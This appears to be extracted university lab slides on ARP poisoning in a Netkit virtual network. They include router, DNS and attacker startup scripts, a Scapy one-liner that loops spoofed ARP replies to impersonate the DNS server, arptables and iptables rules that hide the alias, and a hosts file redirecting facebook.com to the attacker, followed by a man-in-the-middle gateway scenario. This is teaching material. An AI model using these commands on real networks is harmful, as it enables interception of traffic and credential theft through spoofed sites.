ra-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/rat-es2011... ·...
TRANSCRIPT
![Page 1: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/1.jpg)
Part 3
ARP poisoning
![Page 2: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/2.jpg)
Outline
1. ARP management in Linux 2. NETKIT LAB Setup 3. HTTP connecBon (from L2 to L7) 4. ARP poisoning aHack 5. AHacker configuraBon and setup
![Page 3: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/3.jpg)
ARP management in Linux The ARP cache can be manipulated with the command “ip neighbour”. HINT: no need to type “neighbour”. Try “ip n” Run “man ip” for details.
1. Show the cache:
pc1:$ ip n show
2. Add a ARP entry: pc1:$ ip n add to “ip_addr” lladdr “mac_addr” dev
“dev_name” state “state_name” (state: permanent, stale, noarp, rachable)
3. Delete a ARP entry: pc1:$ ip n del to “ip_addr” dev “dev_name”
4. Flush the cache: pc1:$ ip n flush dev “dev_name” state “state_name”
![Page 4: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/4.jpg)
NETKIT LAB • Download lab tarball from: byron.netgroup.uniroma2.it/~marlon/es2010-‐p3.tar • Preliminary operaBons:
– knoppix:$ tar xvf es2010-p3.tar – knoppix:$ cd arppoisoning/patch – knoppix:$ ./apply.sh
• The LAB is made with LSTART netkit command. For any details “man lstart” – For each folder a vm is started with the same name – See lab.conf for network configuraBon – Each machine in the lab starts at startup the script machine.startup – Each file in the folder “machine/” is overwriHen in the filesystem
• To start the LAB: – knoppix:$ arp_poisoning/start_lab
![Page 5: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/5.jpg)
NETKIT lab set-‐up
dns
evil0
victim
Knoppixrouter
Iface:eth110.0.0.1
Iface:tap192.168.1.1
Iface:eth0192.168.1.2
Iface:eth0DHCP
CollisionDomain A
UML(“virtual world”)
Knoppix Live
+ DHCP server
Iface:eth010.0.0.2
Iface:eth010.0.0.232
Iface:eth0DHCP conf.
pc1
Iface:eth0DHCP conf.
![Page 6: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/6.jpg)
LAB Setup Lab.conf: router[0]=tap,192.168.1.1,192.168.1.2 router[1]=A dns[0]=A victim[0]=A pc1[0]=A evil0[0]=A evil0[mem]=64 start_lab: #!/bin/bash lstart router pc1 victim evil0 dns
![Page 7: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/7.jpg)
router start-‐up and configuraBon router.startup: ip link set eth1 up ip link set address 00:00:00:00:00:01 dev eth1 ip address add 10.0.0.1/24 dev eth1 /etc/init.d/dhcp3-server start echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A POSTROUTING -s 10.0.0.0/24 -j MASQUERADE router/etc/dhcp3/dhcpd.conf: optiondomain-name-servers 10.0.0.2; optionrouters 10.0.0.1; default-lease-time 3600; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; }
![Page 8: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/8.jpg)
dns startup and configuraBon dns.startup: ip link set eth0 up ip link set address 00:00:00:00:00:02 dev eth0 ip address add 10.0.0.2/24 dev eth0 ip route add default via 10.0.0.1 /etc/init.d/dnsmasq start Dnsmasq configuration: Seedns/etc/dnsmasq.confandresolv.conf
![Page 9: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/9.jpg)
pc1 and vicBm start-‐up pc1.startup: dhclient eth0 ip link set address 00:00:00:00:00:10 dev eth0 victim.startup: dhclient eth0 ip link set address 00:00:00:00:00:aa dev eth0
Q: why don’t we set the default GW route as for the VMs in lesson 2? Q: what is the difference between this LAN and the one in Lesson 2?
![Page 10: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/10.jpg)
What happens when a web browser connects?
Client
DNS
Router
LAN
1. Who is DNS (ARP) 2. Server name resoluBon (DNS) 3. Who is default GW? (ARP) 4. HTTP get trasmission (HTTP)
Hypothesis : ARP and DNS cache empty
![Page 11: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/11.jpg)
What happens when a web browser connects?
Let’s try it on pc1:
1. Run tcpdump: pc1:$ nohup tcpdump –i eth0 –w /hosthome/dump.pcap –s0&
2. Open a web page: pc1:$ links www.corriere.it
3. Open wireshark in knoppix: knoppix:$ wireshark /home/knoppix/dump.pcap
![Page 12: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/12.jpg)
AHack outline
APack GOAL: 1. ARP poisoning aHack for DNS server impersonificaBon 2. Wrong DNS resoluBon for some websites 3. HTTP request serving How do we get there? 1. Network emulaBon -‐ NETKIT 2. ARP packet forging -‐ SCAPY 3. DNS server impersonificaBon – Dnsmasq 4. WEB server impersonificaBon – Apache2
![Page 13: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/13.jpg)
INTERNETRouter
DHCP server
DNS
evil0
victim
LAN10.0.0.0/24
www.google.com
AHack scenario
1a – ARP cache poisoning evil0 to vicBm: “I am your DNS server”
Spoofed ARP resp.
![Page 14: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/14.jpg)
INTERNETRouter
DHCP server
DNS
evil0
victim
LAN10.0.0.0/24
www.google.com
AHack scenario
2a– DSN impersonificaZon vicBm: “who is www.facebook.com” evil0: “I’m www.facebook.com”
DSN Req/Resp
![Page 15: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/15.jpg)
INTERNETRouter
DHCP server
DNS
evil0
victim
LAN10.0.0.0/24
www.google.com
AHack scenario
HTTP
3a – WEB server impersonificaZon evil0 starts serving HTTP request for www.facebook.com
![Page 16: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/16.jpg)
Evil0 start-‐up (part 1)
evil0.startup: echo "configuring eth0 interface" ip link set eth0 up ip link set address 00:00:00:00:00:ff dev eth0 ip address add 10.0.0.232/24 dev eth0 ip route add default via 10.0.0.1 echo "configuring alias and hide it" ip address add 10.0.0.2/24 dev eth0 ip route add default via 10.0.0.1 arptables -F arptables -A INPUT -d 10.0.0.2 -j DROP arptables -A OUTPUT -s 10.0.0.2 -j mangle --mangle-ip-s 10.0.0.232 iptables -A OUTPUT -p icmp -s 10.0.0.2 -j DROP iptables -A INPUT -p icmp -d 10.0.0.2 -j DROP
![Page 17: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/17.jpg)
Evil0 start-‐up (part 2)
evil0.startup: /etc/init.d/dnsmasq start /etc/init.d/apache2 start echo "setting DNS nameserver" echo "nameserver 208.67.222.222" >> /etc/resolv.conf echo "installing scapy" dpkg -i /root/python-support_1.0.6_all.deb dpkg -i /root/python-scapy_2.0.1-1_all.deb
![Page 18: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/18.jpg)
Evil0 configuraBon
For DNS configuraZon see: evil0/etc/dnsmasq.conf evil0/etc/hosts In parZcular /etc/hosts: 10.0.0.232 www.facebook.com 10.0.0.232 www.repubblica.it 69.147.76.15 www.google.com WEB data goes into /evil0/var/www/
![Page 19: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/19.jpg)
ARP poisoning with SCAPY
evil0:$ scapy >>ips="10.0.0.2" >>ipd="10.0.0.101" >>hs="00:00:00:00:00:FF" >>hd="00:00:00:00:00:AA" >>a=Ether(src=hs,dst=hd) >>b=ARP(op=2,psrc=ips,pdst=ipd,hwdst=hd,hwsrc=hs) >>p=a/b >>sendp(p,loop=1,inter=1)
GOAL: evil0 wants to poison vicBm’s ARP cache and steal DNS’s IP address vicBm -‐ IP: 10.0.0.101; L2: 00:00:00:00:00:AA DNS server -‐ IP: 10.0.0.2 evil0 -‐ L2: 00:00:00:00:00:FF
![Page 20: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/20.jpg)
What’s going on?
1. Watch ARP cache victim:$ watch “ip n”
2. Resolve a name: victim:$ host www.repubblica.com
3. Open the browser victim:$ links www.facebook.com victim:$ links www.google.com
Q: Is there anything we can do? A: ARP and DNS staBc entry (“ip n add” and “/etc/hosts file”)
![Page 21: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/21.jpg)
INTERNETRouter
DHCP server
DNS
evil0
victim
LAN10.0.0.0/24
www.google.com
MIM AHack scenario
1b – ARP cache poisoning evil0 to vicBm: “I am your default GW” evil0 to GW: “I am vicBm” (not strictly necessary -‐ NAT)
Spoofed ARP resp.
![Page 22: RA-dhcp-arp-port stealing-arp poisoningstud.netgroup.uniroma2.it/cgrl/2018/slides/RAT-es2011... · 2018-05-18 · Evil0%startup%(part1)% evil0.startup: echo "configuring eth0 interface"](https://reader030.vdocuments.mx/reader030/viewer/2022040821/5e6a9e701c779b3afe4b78d7/html5/thumbnails/22.jpg)
INTERNETRouter
DHCP server
DNS
evil0
victim
LAN10.0.0.0/24
www.google.com
MIM AHack scenario
2b– Router impersonificaZon -‐ MIM vicBm’s default GW = evil0 All traffic to outside the LAN is routed through the aHacker evil0